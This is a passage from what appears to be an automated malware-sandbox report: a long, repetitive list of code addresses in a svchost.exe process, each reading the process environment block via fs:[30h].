Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326674D mov esi, dword ptr fs:[00000030h]	2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]	2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]	2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230750 mov eax, dword ptr fs:[00000030h]	2_2_03230750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE75D mov eax, dword ptr fs:[00000030h]	2_2_032BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]	2_2_03272750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]	2_2_03272750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B4755 mov eax, dword ptr fs:[00000030h]	2_2_032B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032307AF mov eax, dword ptr fs:[00000030h]	2_2_032307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E47A0 mov eax, dword ptr fs:[00000030h]	2_2_032E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D678E mov eax, dword ptr fs:[00000030h]	2_2_032D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]	2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]	2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]	2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_032BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]	2_2_032347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]	2_2_032347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0323C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B07C3 mov eax, dword ptr fs:[00000030h]	2_2_032B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E627 mov eax, dword ptr fs:[00000030h]	2_2_0324E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03266620 mov eax, dword ptr fs:[00000030h]	2_2_03266620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268620 mov eax, dword ptr fs:[00000030h]	2_2_03268620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323262C mov eax, dword ptr fs:[00000030h]	2_2_0323262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE609 mov eax, dword ptr fs:[00000030h]	2_2_032AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272619 mov eax, dword ptr fs:[00000030h]	2_2_03272619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]	2_2_032F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]	2_2_032F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]	2_2_0326A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]	2_2_0326A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03262674 mov eax, dword ptr fs:[00000030h]	2_2_03262674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324C640 mov eax, dword ptr fs:[00000030h]	2_2_0324C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0326C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032666B0 mov eax, dword ptr fs:[00000030h]	2_2_032666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]	2_2_03234690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]	2_2_03234690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]	2_2_032B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]	2_2_032B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0326A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0326A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6500 mov eax, dword ptr fs:[00000030h]	2_2_032C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]	2_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]	2_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]	2_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]	2_2_03238550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]	2_2_03238550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]	2_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]	2_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]	2_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]	2_2_032545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]	2_2_032545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232582 mov eax, dword ptr fs:[00000030h]	2_2_03232582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232582 mov ecx, dword ptr fs:[00000030h]	2_2_03232582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264588 mov eax, dword ptr fs:[00000030h]	2_2_03264588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E59C mov eax, dword ptr fs:[00000030h]	2_2_0326E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032325E0 mov eax, dword ptr fs:[00000030h]	2_2_032325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]	2_2_0326C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]	2_2_0326C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]	2_2_0326E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]	2_2_0326E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032365D0 mov eax, dword ptr fs:[00000030h]	2_2_032365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0326A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0326A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]	2_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]	2_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]	2_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C427 mov eax, dword ptr fs:[00000030h]	2_2_0322C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A430 mov eax, dword ptr fs:[00000030h]	2_2_0326A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]	2_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]	2_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]	2_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC460 mov ecx, dword ptr fs:[00000030h]	2_2_032BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]	2_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]	2_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]	2_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA456 mov eax, dword ptr fs:[00000030h]	2_2_032EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322645D mov eax, dword ptr fs:[00000030h]	2_2_0322645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325245A mov eax, dword ptr fs:[00000030h]	2_2_0325245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032364AB mov eax, dword ptr fs:[00000030h]	2_2_032364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032644B0 mov ecx, dword ptr fs:[00000030h]	2_2_032644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_032BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA49A mov eax, dword ptr fs:[00000030h]	2_2_032EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032304E5 mov ecx, dword ptr fs:[00000030h]	2_2_032304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]	2_2_0325EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]	2_2_0325EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]	2_2_032F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]	2_2_032F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322CB7E mov eax, dword ptr fs:[00000030h]	2_2_0322CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]	2_2_032E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]	2_2_032E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]	2_2_032C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]	2_2_032C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FAB40 mov eax, dword ptr fs:[00000030h]	2_2_032FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D8B42 mov eax, dword ptr fs:[00000030h]	2_2_032D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DEB50 mov eax, dword ptr fs:[00000030h]	2_2_032DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]	2_2_03240BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]	2_2_03240BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_032E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_032E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]	2_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]	2_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]	2_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EBFC mov eax, dword ptr fs:[00000030h]	2_2_0325EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_032BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]	2_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]	2_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]	2_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]	2_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]	2_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]	2_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_032DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA24 mov eax, dword ptr fs:[00000030h]	2_2_0326CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EA2E mov eax, dword ptr fs:[00000030h]	2_2_0325EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]	2_2_03254A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]	2_2_03254A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA38 mov eax, dword ptr fs:[00000030h]	2_2_0326CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BCA11 mov eax, dword ptr fs:[00000030h]	2_2_032BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]	2_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]	2_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]	2_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DEA60 mov eax, dword ptr fs:[00000030h]	2_2_032DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]	2_2_032ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]	2_2_032ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]	2_2_03240A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]	2_2_03240A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]	2_2_03238AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]	2_2_03238AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286AA4 mov eax, dword ptr fs:[00000030h]	2_2_03286AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304A80 mov eax, dword ptr fs:[00000030h]	2_2_03304A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268A90 mov edx, dword ptr fs:[00000030h]	2_2_03268A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]	2_2_0326AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]	2_2_0326AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]	2_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]	2_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]	2_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230AD0 mov eax, dword ptr fs:[00000030h]	2_2_03230AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]	2_2_03264AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]	2_2_03264AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B892A mov eax, dword ptr fs:[00000030h]	2_2_032B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C892B mov eax, dword ptr fs:[00000030h]	2_2_032C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]	2_2_032AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]	2_2_032AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC912 mov eax, dword ptr fs:[00000030h]	2_2_032BC912
